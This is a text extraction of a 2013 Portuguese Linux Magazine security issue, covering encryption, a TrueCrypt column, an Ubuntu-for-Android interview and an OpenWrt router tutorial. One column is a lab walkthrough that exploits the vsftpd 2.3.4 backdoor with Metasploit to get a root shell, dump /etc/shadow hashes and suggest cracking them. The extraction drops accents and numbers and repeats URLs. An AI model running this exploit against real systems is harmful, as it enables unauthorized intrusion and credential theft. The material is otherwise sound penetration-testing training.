linux new mwdia - segurança
TRANSCRIPT
-
5/22/2018 Linux New Mwdia - Segurana
1/29
UBUNTU TOUCHP.67Desenvolva aplicativos etransforme seu dispositivo mvel
Segurana
MEDIALIN
WWW.LINUXMAGAZINE.COM.BR
A REVISTA DO PROFISSIONAL DE TI
# 106 Setembro 2013
MADDOG P.23Concurso para melhoriado desempenho do kernel
CEZAR TAURION P.26Cientista de Dados: oprofissional de Big Data
AUGUSTO CAMPOS P.10O curioso casodo Truecrypt
#106 09/13
R$ 14,90 7,50
9 771806 942009
0 0 1 0 6
ENTREVISTAp.23Entrevistamos Richard Collins, geren
de produtos da Canonical, que conto
as novidades do Ubuntu para Andro
EM TEMPOS ONDE OS SEGREDOS QUE VOC CONFIA AOSEU EMAIL E AOS SEUS SISTEMAS LOCAIS NO SO TOSECRETOS ASSIM, TODO CUIDADO POUCO P.32
Bate-papo seguro e criptografado P.34 Novos padres de segurana para SSL/TLS P.37
ZFS criptografado com Ubuntu P.42
Certificados pessoais auto-assinados P.47
MFT: Nova opo para transporte seguro de arquivos P.51
SEGURANAP.76Container chroot paraexecuo de programas perigosos
ANDROIDP.69Melhore a qualidadede som do seu Android
VEJA TAMBM NESTA EDIO: Monitoramento de sistemas com a ferramenta iftop P.54
Gerenciamento de configurao com Puppet P.57
Transforme um simples roteador em um servidor com OpenWrt P.60
Use o processador para assumir a tarefa dos clculos 3D P.72
http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8939 -
5/22/2018 Linux New Mwdia - Segurana
2/29
-
5/22/2018 Linux New Mwdia - Segurana
3/29
4 www.linuxmagazine.com.br
Do lado seguro 47
Klaus Knopper ensina uma forma simples de usar certificados
pessoais auto-assinados e criptografia digital.
Bate-papo seguro 34
Jitsi um programa de bate-papo verstil.
O programa Java pode lidar com todos os protocolos populares
de mensagens instantneas e at mesmo telefonia de vdeo por IP.
Novos padres 37
Numerosos ataques abalaram a segurana da criptografia SSL/
TLS nos ltimos anos. Novos padres poderiam remediar a
situao, mas ainda no so amplamente utilizados.
CAPASegredos bem guardados 32
Em tempos onde os segredos que voc confia ao seu email e aos
seus sitemas locais no so to secretos assim, todo cuidado pouco.
INDICE
Transporte seguro 51
Apesar do FTP ainda fazer um bom servio, se o usurio precisa enviar dados
sensveis, deve considerar a opo pela transferncia de arquivos gerenciados.
ZFS criptografado com Ubuntu 42
Neste artigo, mostraremos como usar a
criptografia de disco do Linux para instalar o
Ubuntu em um disco criptografado com ZFS.
http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8945http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8951http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8944http://www.lnm.com.br/article/8943http://www.lnm.com.br/article/8943 -
5/22/2018 Linux New Mwdia - Segurana
4/29
5Linux Magazine #106 | Setembrode 2013
| NDICELinux Magazine xxx
COLUNASColuna: Jon maddog Hall 23
Coluna Antonio Pdua 24
Coluna: Cezar Taurion 26
Entrevista: Richard Collins 28
Notcias 30
Raspberry Pi pode ser fabricado no Brasil
Empresas aumentam uso Linux para reduzir custos
CORPORATE
ANDROID
SERVIOS
Charly Khnast 07
Alexandre Borges 08
Augusto Campos 10
Kurt Seifried 11
Klaus Knopper 14
Zack Brown 17
Notcias 22
Corretagem na nuvem tendnciapara 2014
Google lana Coder, projeto de cdigolivre para Raspberry Pi
REDESTrfego assistido 54
O iftop uma ferramenta de linha de comando para monitoramento
de sistema que pode ajudar a identificar os problemas de largurade banda (bandwidth hogs) e manter o movimento de trfego.
SEGURANAPriso privada 76Virtualizar bom, mas s vezes pode ser um exagero,
se tudo o que o usurio quiser fazer for executar um
programa que poderia representar uma ameaa ao sistema.
O chroot jails oferece uma alternativa leve, rpida e bem testada.
Tubo grfico 72
A ideia simples: se o driver da placa grfica no oferece grficos 3D,
uma ajuda especial delegaria todos os clculos 3D ao processador
principal. Neste artigo, explicamos como fazer esse trabalho..
Editorial 03
Emails 06
Linux.local 78
Preview 82
Desenvolvimento para Ubuntu Touch 67
Aprenda a desenvolver aplicativos para o Ubuntu Touch e
torne seu dispositivo mvel em um computador Linux de bolso!
Manuteno automatizada 57
Se o usurio deseja que apenas suas tardes pertenamao trabalho, no precisa depender de gerenciamentode configurao. Mas necessrio perder a hora extraapenas para configurar um sistema de servidor?
TUTORIAL
Servidor de1 watt 60
Aprenda como instalar e configurar este novosistema operacional em seu dispositivo Android.
ANALISE
Aperte o play! 69
Os melhores aplicativos de msica e truques paramelhorar a qualidade de som do seu Android.
http://www.lnm.com.br/article/8939http://www.lnm.com.br/article/8982http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8926http://www.lnm.com.br/article/8932http://www.lnm.com.br/article/8927http://www.lnm.com.br/article/8937http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8963http://www.lnm.com.br/article/8959http://www.lnm.com.br/article/8989http://www.lnm.com.br/article/8937http://www.lnm.com.br/article/8927http://www.lnm.com.br/article/8932http://www.lnm.com.br/article/8926http://www.lnm.com.br/article/8990http://www.lnm.com.br/article/8988http://www.lnm.com.br/article/8982http://www.lnm.com.br/article/8939 -
5/22/2018 Linux New Mwdia - Segurana
5/29
8 www.linuxmagazine.com.br
Neste ms, sem muita demora, vamos utilizaro Metasploit de forma mais incisiva. Em nos-so ambiente, podemos utilizar o ambiente
de desenvolvimento j instalado no Ubuntu (para
o qual foi mostrado o procedimento de instalaona coluna anterior) ou ainda o Kali Linux [1], uma
mquina prpria para este tipo de teste (com Me-
tasploitable [2]) com endereo IP ... eum Windows XP SP com endereo IP ....Realizando o escananeamento destas mquinas
com Nessus ou OpenVAS, obtemos um nmero
significativo de vulnerabilidades e, quem sabe, boaparte delas explorveis. Por exemplo, escaneandoa mquina Metasploitable, descobre-se uma vul-nerabilidade crtica chamada vsftpd Smiley Face
Backdoor [3]e com esta informao poderemos
realizar uma explorao de modo bastante dire-
to. Digite msfconsolepara obter acesso ao console
do Metasploit e procure por um exploit para esta
vulnerabilidade em especfico:
msf> search 73573Matching Modules================ Name Disclosure Date Rank Description - - --
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD
v2.3.4 BackdoorCommand Execution
Para saber mais sobre este ex-
ploit, proceda da seguinte forma:
msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor
Selecione este exploit para uso e verificamos suas opes:
msf> use exploit/unix/ftp/vsftpd_234_backdoor msfexploit(vsftpd_234_backdoor) > show optionsModule options (exploit/unix ftp/vsftpd_234_backdoor): Name CurrentSetting Required Description - -- -- RHOST yes The target address RPORT 21 yes The target portExploit target: Id Name -- - 0 Automatic
Como o leitor pode notar, a mquina remota (a
ser explorada) no est especificada com seu en-
dereo IP e, alm disso, o nico tipo de alvo dispo-nvel Automatic o que facilita a nossa vida, ou
seja, o Metasploit determina automaticamente o
tipo do sistema operacional:
msf exploit(vsftpd_234_backdoor) > set RHOST
192.168.1.105RHOST => 192.168.1.105msf exploit(vsftpd_234_backdoor) > set TARGET 0TARGET => 0
necessrio escolher opayload(cdigo, backdoor,trojan etc.) a ser enviado para a mquina alvo uma
vez ela tenha sido explorada. Este passo essencial
j que o payload nos permite, muitas vezes, acesso
remoto mquina explorada (por exemplo, se esti-
vssemos executando um comando Netcat sendo
executado em modo de escuta). Portanto devemos
executar o comando:
msf exploit(vsftpd_234_backdoor) > show payloadsCompatible Payloads=================== Name Disclosure Date Rank Description - - -- cmd/unix/interact normal
Unix Command, Interact with Established Connection
para obter mais informaes sobre o payload, sele-
cion-lo para ser enviado para a mquina sob ataque
e ainda verificar quais so suas opes disponveis
(neste caso, no haver nenhuma opo):
Coluna do Alexandre
Metasploit parte 6Na coluna deste ms, aprenda como a efetivar um ataque bem sucedido
com Metasploit atravs de uma vulnerabilidade j conhecida.
por Alexandre Borges
-
5/22/2018 Linux New Mwdia - Segurana
6/29
9Linux Magazine #XX | Msde 200X
msf exploit(vsftpd_234_backdoor) > info cmd/unix/interactmsf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact payload => cmd/unix/interactmsf exploit(vsftpd_234_backdoor) > show optionsModule options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description - -- -- RHOST 192.168.1.105 yes The target address RPORT 21 yes The target portPayload options (cmd/unix/interact): Name Current Setting Required Description - -- --Exploit target: Id Name -- - 0 Automatic
FInalmente, somente nos resta realizar o ataque
propriamente dito:
msf exploit(vsftpd_234_backdoor) > exploit
[*] Banner: 220 (vsFTPd 2.3.4)[*] USER: 331 Please specify the password.[+] Backdoor service has been spawned, handling...[+] UID: uid=0(root) gid=0(root)[*] Found shell.[*] Command shell session 3 opened(192.168.1.107:55485 -> 192.168.1.105:6200) at2013-09-15 18:56:55 -0300
uname -aLinux metasploitable 2.6.24-16-server #1 SMP Thu Apr10 13:58:00 UTC 2008 i686 GNU/Linuxiduid=0(root) gid=0(root)cat /etc/shadowroot:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::daemon:*:14684:0:99999:7:::bin:*:14684:0:99999:7:::sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD
9l0:14742:0:99999:7:::
Nunca foi to fcil! Quer quebrar
a senha? Use o John the Ripper [4].At o ms que vem.n
Mais informaes[1] Kali Linux: http://www.kali.org/
[2] Metasploitable 2:http://sourceforge.net/pro-jects/metasploitable/files/Metasploitable2/
[3] Vulnerabilidade vsftpd Smiley Face Backdoor:http://osvdb.org/73573
[4] Como quebrar senhas:http://alexandreborges.org/2013/08/05/introduction-to-password-cracking-part-1/
Alexandre Borges (linkedin: br.linkedin.com/in/alebor-ges) instrutor e especialista snior em sistemas ope-racionais Unix, Linux, Banco de Dados, Virtualizao,Cluster, Storage, Servidores, Backup, Desempenho e Se-gurana, alm de possuir profundo envolvimento comassuntos relacionados ao kernel Linux.
http://www.unodata.com.br/http://www.unodata.com.br/http://www.unodata.com.br/http://www.unodata.com.br/http://www.unodata.com.br/ -
5/22/2018 Linux New Mwdia - Segurana
7/29
10 www.linuxmagazine.com.br
OTruecrypt um utilitrio de criptografia de
disco popular na plataforma Windows, e dis-
ponvel tambm para Linux e Mac OS X. Ele
cria um disco criptografado em uma partio, um
disco inteiro (incluindo dispositivos removveis) oumesmo em uma unidade virtual mapeada a partir de
um arquivo comum.
Ele se diferencia de outras solues por ofere-
cer mecanismos que permitem buscar e manter
escondida a prpria existncia de um volume
criptografado e por oferecer diversas tcnicas de
acelerao para permitir gravar e acessar os dados
com velocidades que se aproximam do uso dos
mesmos dispositivos sem criptografia (dependen-
do da aplicao, claro). Alem disso, ele consegue
criptografar at mesmo o disco onde est instalado
o sistema operacional na plataforma Windows,
onde isso no to comum.
O cdigo-fonte do Truecrypt est disponvel,
mas os seus termos de licenciamento so um dos
aspectos que o tornam um caso curioso: por mais
que oferea as condies fun-
damentais de permiso de
uso, estudo, modificao e
redistribuio, a licena do
TrueCrypt inclui algumas
restries sui generis (por
exemplo, probe o uso e re-distribuio do software a
quem no compreender a
ntegra da licena) que at
hoje a impedem de ser
considerada free soft-
ware ou open source
(a ltima avaliao a
respeito foi em ou-
tubro de ), e
faz com que vrias
distribuies Linux no incluam o Truecrypt em
seus pacotes oficiais.
Outra questo que aumenta o status de curiosi-
dade que o executvel distribudo pelos autores
para uso em Windows tem algumas diferenas vi-sveis nas estruturas de dados, em relao a outras
plataformas, o que j despertou suspeitas de que
ele armazene e vaze chaves de seus usurios.
Essas suspeitas se ampliam porque at recentemente
ningum conseguia gerar um executvel igual ao ofi-
cial, partindo do cdigo-fonte oficial, o que ampliava
as teorias de que havia uma backdoor no executvel
para Windows. No final de outubro, entretanto, um
usurio empreendedor publicou seu passo-a-passo
para chegar a um executvel igual ao original, partindo
dos fontes oficiais. A receita complexa, e envolve at
mesmo usar uma verso de do compilador C++
mencionado na documentao, mas aparentemen-
te ningum acreditava que ela estivesse atualizada.
E para completar o status de curiosidade do
TrueCrypt: ningum sabe quem so seus autores.
Eles assinam o cdigo apenas coletivamente, com
nomes que variam: hoje TrueCrypt Foundation,
mas j foi TrueCrypt Developers Association, e ou-
tros nomes menos cotados. Para atividades que exi-
gem registro, eles variam estados e pases, desde
Nevada, nos EUA, at a Repblica Tcheca.
E se voc pensa que o importante o cdigoestar disponvel, pense de novo: difcil auditar
cdigo de criptografia, e exemplos de incluso de
backdoors no cdigo-fonte, mantendo-as difceis
de detectar, no faltam. No creio ser o caso, mas
tambm no descarto a possibilidade, a princpio.
Por enquanto, no mnimo, trato o TrueCrypt como...
um caso curioso. n
Coluna do Augusto
O curioso caso do TruecryptUma til e excelente ferramenta de criptografia de disco, continua
enfrentando problemas em seu licenciamento.
por Augusto Campos
Augusto Csar Campos administrador de TI e, desde 1996, mantm o site BR-linux.org,que cobre a cena do Software Livre no Brasil e no mundo.
-
5/22/2018 Linux New Mwdia - Segurana
8/29
28 www.linuxmagazine.com.br
Do desktop para
o smartphoneRichard Collins, gerente de produtos da Canonical,
oferece uma prvia do Ubuntu para Android.
por Kristian Kissling
Linux Magazine Qual o projeto
do momento para Ubuntu?
Richard Collins Sou responsvel
pelo Ubuntu para Android. Tambm
tenho trabalhado nos projetos do ta-blet Ubuntu e Ubuntu Phone.
LM J existe um Android:
livre, baseado em Linux e j est
estabelecido no mercado de
smartphones. Porque deveramos
escolher o Ubuntu?
RC O Ubuntu para Android uma
soluo que trabalha em conjunto com
o Android. O Android um sistema
operacional muito bem sucedido, que
proporciona uma excelente experincia
de telefonia mvel; no entanto, o An-
droid s verdadeiramente relevante
como um sistema operacional para
smartphone. Os servios e experin-
cias que funcionam bem no Android
s so projetados e otimizados para
um contexto mvel. Para smartphones
mais recentes que possuem a capaci-
dade de oferecer uma experincia de
desktop, com aplicativos e uma inter-
face de usurio quando conectados a
um monitor atravs de uma conexoHDMI, acreditamos que os usurios
desejem a capacidade total de um
sistema que projetado para desktop
e queiram utilizar os servios que fun-
cionam exatamente da mesma manei-
ra como usariam em seus laptops. O
Ubuntu um sistema operacional de
desktop bem estabelecido, compreen-
dido e usado; por isso, o Android no
pode entregar uma experincia de
desktop do mesmo nvel que o Ubuntu.LM Voc planeja instalar o Ubun-
tu em smartphones dual core como
desktops adicionais. E quanto segu-
rana? Como voc pretende proteger
dados privados, por exemplo, em caso
de perda ou roubo do smartphone?
RC O sistema de segurana ine-
rente ao Ubuntu no afetado. O sis-
tema operacional do Ubuntu funciona
de forma completamente nativa no
hardware e no h acesso ao sistema
Ubuntu a partir de qualquer servio
mvel Android. A soluo Ubuntu para
Android permitir aos usurios fazer
backup e salvar dados pessoais no
servio de nuvem Ubuntu One, e esta
uma maneira de manter os dados
pessoais separados do dispositivo, da
mesma maneira que qualquer outro
tipo de dispositivo que poderia estar
em risco de ser perdido ou roubado,
como um laptop.
Qualquer servio especfico de pro-teo de telefone melhor gerencia-
do a partir do sistema Android por
exemplo, bloquear e excluir dados
remotamente e desativar o telefone
dessa maneira tambm ir proteger
o usurio de ter seus dados pessoais
ou sensveis comprometidos.
Do ponto de vista da empresa, seo dispositivo est sendo usado para
conexo remota, h muitas solues
de segurana que a implementam
na camada do aplicativo, e uma vez
que j provaram funcionar muito
bem para o Ubuntu em laptops,
devem funcionar tambm para o
Ubuntu em smartphones.
LM O pessoal da Engadget
testou o Ubuntu para Android, e
achou o sistema bastante lento.
Qual hardware voc espera ser
executado no Ubuntu?
RC A entrevista com a Engad-
get foi baseada em um prottipo
utilizando o Motorola Atrix . A Ca-
nonical desenvolveu este prottipo
de forma independente, por isso o
desempenho ficou limitado s ca-
pacidades inerentes ao hardware.
Existe uma srie de possibilidades
para melhorar o desempenho do
produto e desde ento temos oti-mizado o sistema para executa-lo
de forma mais eficiente. Mas o mais
importante, ao desenvolvermos a
soluo Ubuntu para Android em
conjunto com um fabricante de
hardware, que o fabricante ter
Entrevista
-
5/22/2018 Linux New Mwdia - Segurana
9/29
29Linux Magazine #XX | Msde 200X
a oportunidade de propor novas
otimizaes e desempenho.
LM Voc j encontrou parcei-
ros oficiais de hardware para co-
operarem com o projeto? Quando
ser possvel adquirir o dispositivo?
RC As discusses ainda estoem andamento e esperamos anun-
ciar a disponibilidade do produto
dentro em breve.
LM H mais fornecedores pla-
nejando comercializar dispositivos
que possam lidar com o dual boot
Android e Ubuntu?
RC Para ser mais preciso, a so-
luo Ubuntu baseada no uso do
kernel Linux para executar dois siste-
mas operacionais ao mesmo tempo.Existem determinados requisitos de
hardware necessrios para suportar
o Ubuntu para Android, como CPU
multicore, e vemos que todos os
principais fabricantes de celulares
que baseiam seus sistemas em ar-
quiteturas ARM esto em processo
de anunciar aparelhos de ponta com
capacidades de CPU multicore.
LM Ser que este projeto tambm
visa colocar o Ubuntu em smartpho-
nes Android habituais, ou o foco est
apenas nos dispositivos dual boot?
RC A estratgia est focada empermitir que smartphones de ponta
possam executar o Android.
LM O cdigo estar disponvel
para os usurios utilizarem em
seus dispositivos?
RC No temos planos imedia-
tos de liberar o cdigo para que os
usurios o instalem em seus prprios
aparelhos, pois isso requer um co-
nhecimento tcnico muito espec-
fico, e a gama de aparelhos capazesde suportar Ubuntu para Android
ainda muito pequena. Tornar o
cdigo disponvel para download
de forma independente no serviria
a qualquer propsito real, uma vez
que extremamente difcil executar
a verso atual do software em um
dispositivo sem o suporte adequado
do fabricante do hardware.
LM Quantos membros da co-
munidade Ubuntu esto envolvidos
no projeto atualmente?
RC Dado que o projeto est em fase
de desenvolvimento, ainda um proje-to interno da Canonical nesta fase. Isto
porque o tipo de trabalho est focado
em atender diretamente aos fabrican-
tes de celulares; no entanto, medida
que conseguirmos mais sucesso com
o produto e ele seja implementado de
forma mais ampla, como um produto
de consumo, surgiro oportunidades
de trabalhar em estreita colaborao
com a comunidade.n
Gostou do artigo?Queremos ouvir sua opinio.Fale conosco em:[email protected]
Este artigo no nosso site:http://lnm.com.br/article/8938
A Linux Magazine oferece estas edies revisadase ampliadasdos livros que te preparam paraas Certificaes LPIC-1 e 2,com as seguintes
novidades:
Exerccios em todos os tpicos
Todo contedo ampliado para a nova verso da prova, atualizada em agosto/2012.
Garanta j os seus pelo site da Linux Magazinewww.linuxmagazine.com.br
LivrosparaCertificaoLPI-1e2!
-
5/22/2018 Linux New Mwdia - Segurana
10/29
32 www.linuxmagazine.com.br
Segredos bem guardadosEm tempos onde os segredos que voc confia ao seu email
e aos seus sistemas locais no so to secretos assim, todo cuidado pouco.
por Flvia Jobstraibizer
Segredos j so coisas difceis
de se confiar a algum (vide
a frase do filme ConAir: Eu
s confio em dois homens neste
mundo, um sou eu e o outro no voc.), imagine ento se os con-
fiamos sistemas e somos pegos
totalmente desprevenidos ao saberque nossas conversas, arquivos e
dados foram surrupiados (ou lidos
sem permisso) por sabe-se l quemem qualquer parte do mundo.
Pois o que frequentemente
vem sendo trazido tona pela
nova gerao Snowden: profis-
sionais que detinham em seu po-der informaes confidenciais dasmais diversas e que decidiram emalgum momento traz-las tona.Entre os membros dessa gerao
podemos citar WikiLeaks, o grupoAnonymous e outros ciberativistas.
sabido que temos de manter cer-to nvel de proteo aos dados que
armazenamos em nossos bancos dedados, sistemas e servidores e que,
mesmo assim, esses dados podem
ser coletados em algum momento
(lidos atravs de sniffers, copiados
por invasores ou sob outras formas).Mas talvez, tornar esses dados ile-
gveis ou ento muito difceis deserem decifrados seja um caminho
para evitar o roubo de informaes.Nesta edio da Linux Magazine
vamos falar sobre criptografia, esse ve-lho assunto j conhecido atualmenteat mesmo por leigos em informticapor figurar na lista dos dez principaisassuntos da atualidade (talvez depoisdo lanamento do game GTA V.
Voc vai aprender nas prximas
pginas como criar um sistema de
arquivos ZFS criptografado, evitan-do assim que eventuais informaesroubadas sejam lidas facilmente
pelo invasor (e consequentementedistribudas). Tambm vai aprendercomo gravar conversas telefnicas
atravs dos protocolos Jabber
e SIP com o aplicativo Jitsi e como
enviar arquivos de grande porte
com uma camada adicional de crip-tografia deixando de lado o velho
FTP e adotando o novo protocolo
MFT (Managed File Transfer).
Ainda nesta edio, no perca o
artigo que ir ensinar a criar e utilizar
assinaturas digitais e criptografia comSSL e para finalizar, saiba como resol-ver problemas com a encriptao dedados do protocolo TLS (antigo SSL).
As prximas pginas podem au-
xili-lo a evitar diversos problemas
se voc algum que possui (ou tra-
balha em uma empresa que possui)
informaes sigilosas armazenadas
e no quer v-las sendo exibidas pora por algum popular ciberativista daatualidade.
Boa leitura!n
Capa
Matrias de capa
Bate-papo seguro 34
Novos padres 41
ZFS criptografado com Ubuntu 34
Do lado seguro 47
Transporte seguro 51
-
5/22/2018 Linux New Mwdia - Segurana
11/29
60 www.linuxmagazine.com.br
Servidor de
1 watt
A
TP-Link [1] fabrica rotea-
dores em vrias classes de
desempenho. O TL-MR(figura 1) comercializado pelo
fabricante como um roteador
mvel, porque pequeno e leve.No entanto, ele no suporta G
(quadro 1), embora seja possvelatualiz-lo atravs da porta USB.Assim, o roteador destinado apessoas que no precisam de Gou possuem um dispositivo de
conexo UMTS e, portanto, no
desejam investir em um roteador
mvel UMTS caro. No entanto, ouso normal do roteador no ofoco deste artigo; em vez disso,descreveremos como convert-
lo em um mini servidor.Para fazer isso, substituiremos o
firmware existente pelo OpenWrt
[2], uma distribuio Linux especial
para microdispositivos. O OpenWrt
contempla um sistema de geren-
ciamento de pacotes que no de
forma alguma inferior ao das dis-tribuies clssicas; assim, apenasas limitaes do hardware podero
conter a criatividade do usurio.
O equipamentoO TL-MR bastante adequa-
do para este fim, por duas razes:por um lado, custa euros (ou dlares americanos) o que no muito, se acontecer do usurio bri-
car (danificar permanentemente
o sistema) do aparelho. Poroutro lado, o fabricante no
impe obstculos na instala-o de firmware de terceiros.
Para comear, baixe a verso
correta do OpenWrt [3]e siga
as breves (porm suficientes)instrues que vm com o roteador
para conectar-se interface web do
dispositivo. Quando chegar l, faa
o upload do novo firmware para oTL-MR, selecionando Upgradeno formulrio web (fgura 2).
Fazer o upload do firmware o ni-
co passo realmente crtico de todo oprocesso. Assim, antes de carregar aimagem, essencial verificar as pos-tagens na wiki do OpenWrt [3]e se-
guir as instrues
adequadas. De-
pois de instal-lo,o prximo passo a configuraobsica, particular-
mente para a rede.
Em seguida ser neces-
srio configurar uma srie de pacotes
de software que atualizam o suporteUSB para meios de dados (do tipo
pendrives ou discos rgidos).Esta etapa permite fazer o boot
do roteador a partir de um disco ex-
terno. No sistema de arquivos raiz,agora estendido, o usurio adiciona
mais pacotes de software do reposi-
trio OpenWrt para o aplicativo real.
Tutorial
Neste artigo, mostraremos como usar o OpenWrt para
liberar o roteador TL-MR3020 do firmware proprietrio
e convert-lo em um servidor conjunto para uma
rede domstica.
por Bernhard Bablok
Figura 1 O TL-MR3020 da TP-Link ( esquerda) no maior do quea palma da mo do usurio. O mini hub USB de Pearl (direita) atuacomo um expansor.
-
5/22/2018 Linux New Mwdia - Segurana
12/29
61Linux Magazine #106 | Setembrode 2013
Primeiro contatoAps a atualizao do firmware ereboot do dispositivo, podemos co-
nectar o PC ou laptop ao roteador
com o uso de um cabo. Configure a
rede (normalmente podemos usaro gerenciador de rede para isso) efaa o login via Telnet em ...
(fgura 3). O roteador executa um ser-
vidor DHCP que fornece um ende-reo adequado para o PC ou laptop.
Neste ponto, devemos definir
uma senha para o root.O OpenWrt,
ento, desliga o servidor Telnet
por razes de segurana e inicia oservidor SSH. Em seguida, ajuste aconfigurao de rede para que o
roteador esteja na rede domstica;
siga em frente e adicione mais soft-
ware. Para mais informaes sobre o
sistema de configurao OpenWrt,
veja o quadro 2.Para usar o roteador como um
servidor na rede domstica, a con-figurao de rede deve se parecercom a listagem 1(/etc/config/network)
e listagem 2(/etc/config/wireless). As
linhas 9-15 na listagem 1configuram
a interface WLAN. Na listagem 2, a
linha 19garante que o servidor estejaintegrado rede como um clientede WLAN e no como um ponto de
acesso ou roteador.Aps o reboot, o dispositivo deve
ser encontrado no endereo de rede
configurado. Se no, o modo de
emergncia pode ajudar: durante o
processo de boot, pressione o boto
WPS to logo comece a piscar. Se o
LED piscar rapidamente, ligue-o no-
vamente. Agora o dispositivo estar
Figura 2O OpenWrt carregado como uma atualizao de firmwareatravs da interface web original no TL-MR3020.
Figura 3 Feito: O primeiro login no OpenWrt.
Listagem 1:/etc/config/network01# /etc/config/network---------------0203config interface 'loopback'
04option ifname 'lo'05option proto 'static'06option ipaddr '127.0.0.1'07option netmask '255.0.0.0'0809config interface 'wifi'10option proto 'static'11option ipaddr
'192.168.3.100'12option netmask
'255.255.255.0'13option gateway '192.168.3.1'14list dns '192.168.3.1'15list dns '8.8.8.8'
-
5/22/2018 Linux New Mwdia - Segurana
13/29
62 www.linuxmagazine.com.br
no modo Failsafe com o endereo
padro ... e executando odaemon Telnet. Podemos nos co-nectar ao Telnet e fazer as correes
necessrias. No entanto, nenhum
servidor DHCP est disponvel noroteador neste modo. Devemos
atribuir um endereo IP ao prpriocomputador manualmente.
Mais softwareA imagem do firmware original nocontm todos os componentes ne-cessrios para o funcionamentodo sistema de arquivos raiz em um
pendrive USB, assim, teremos que
adicion-los agora. Aps concluir comsucesso a configurao de rede, omini roteador pode acessar a Internet
e usar o sistema de gerenciamentode pacotes conveniente para instalar
software adicional retroativamente.
O ponto crucial o comandoopkg,
que precisamos executar comoroot.
Para fazer isso, primeiro chame opkgupdatepara atualizar a lista de pacotes.
Em seguida, instale os pacotes especi-
ficados usando o seguinte comando:
# opkg install
Se o usurio estiver procurando
por um pacote especfico, o subco-mando listgera uma lista de pa-cotes com descries breves. Paraa instalao USB, precisamos basi-camente de um conjunto de paco-tes do kernel (listagem 3). melhorparticionar e formatar o pendriveUSB (/dev/sdbna listagem podeser necessrio ajustar isso) no PC.Alm da partio raiz, desejvelmanter uma partio homee, acimade tudo, espao de swap.
Depois, podemos simplesmente
conectar o pendrive no roteador e
Figura 4 Usando a interface web no OpenWrt para recuperar o estado do sistema.
Quadro 1: Hardware
O TL-MR3020 uma pequena caixa de plstico branca(fgura 1) medindo 7,4 x 6,7x 2,2 centmetros e pesando apenas 60 gramas. Um conector USB mini usadopara a fonte de alimentao e o adaptador AC oferecido fornece 1 watt. Almdisso, o roteador tambm funciona sem problemas em uma porta USB. Alm dis-so, o TL-MR3020 inclui uma porta USB 2.0 e uma porta Ethernet RJ45 (100Mbps).A TP-Link fornece um curto cabo de extenso para esta ltima. No lado sem fio,o pequeno roteador suporta IEEE 802.11b/g/n em at 150Mbps.
O TL-MR3020 utiliza cinco LEDs para indicar o status, quatro dos quais podem
ser programados. H tambm um boto para a configurao sem fio via WPS eum desbloqueador com trs posies (3G/WISP/AP). Por dentro, o roteador possuiuma CPU ARM de 400MHz e 32MB de RAM. O sistema operacional reside em umchip de memria flash de 4 MB. A porta USB usada com o firmware original paraconectar um dispositivo de conexo UMTS para operao como um roteador 3Gmvel. Sem um pendrive, o dispositivo funciona como um ponto de acesso sem fio.
